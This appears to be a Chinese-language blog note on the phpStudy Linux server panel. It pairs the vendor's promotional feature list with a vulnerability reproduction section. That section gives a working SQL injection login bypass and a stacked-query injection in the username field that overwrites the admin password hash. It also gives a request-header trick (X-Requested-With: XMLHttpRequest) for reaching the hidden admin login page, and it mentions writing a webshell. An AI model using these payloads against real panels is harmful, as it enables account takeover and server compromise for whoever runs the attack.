phpstudy-linux面板(小皮面板)

官网地址:https://www.xp.cn/linux.html

前言

phpStudy Linux 面板是什么
phpStudy Linux 面板是由phpStudy官方团队（xp.cn）针对Linux服务器推出的一款服务器环境搭建以及管理工具。

[info]注意：phpStudy 针对Linux服务器集成环境一共推出过两款软件，本软件为 phpStudy Linux 面板，是最近刚刚推出的最新版；另一款是 phpStudy for Linux 2014 版本 是比较老的产品了，具体可参考：https://www.xp.cn/linux.html
[/info]
phpStudy Linux 面板特色
所有软件免费：phpStudy是一个知名老牌的服务器集成环境工具，我们一直秉承免费公益的理念，帮助广大站长方便、快速的搭建服务器环境。2019年我们新推出的面板继续免费，所有的软件安装全部免费。
可视化快速部署：“让天下没有难配的服务器环境！”这是我们的产品理念，本phpStudy Linux 面板支持可视化安装、搭建WEB服务器环境，包含各种功能配置，非常方便、快捷！
功能齐全：包含安装WEB环境所必须的“LAMP”或者“LNMP”软件，另外包括WEB的配置、安全的配置、监控报表、文件管理、操作日志等，功能还在不断的增加中！
高效运维：通过可视化的web端面板可以轻松部署和管理上百个网站，另外可以时刻监控服务器和网站的运行情况，提升运维效率！
安全稳定、不断更新：网站三天两头的打不开或者被黑等是运维们最头疼的，所以为了确保服务器环境的安全稳定运行，phpStudy团队在不断的更新维护！

参考视频

https://www.bilibili.com/video/BV1Yc411j7TP/

漏洞复现

正常情况：

万能密码

admin' and 1=1 #

[warning]万能密码默认使得程序直接崩溃，无法直接利用[/warning]

用户名处注入更新密码：

admin';UPDATE ADMINS set PASSWORD = '67f43efc5701784db1504e4993d7e393' where username = 'admin';-- 

成功登录:

利用难点

找后台方法如下:
需要给请求头加上如下参数

X-Requested-with:
XMLHttpRequest

请求头加上以上参数即可访问面板登录页面,无需知道路径,若写webshell，则访问webshell的时候同样也需要带上这个请求头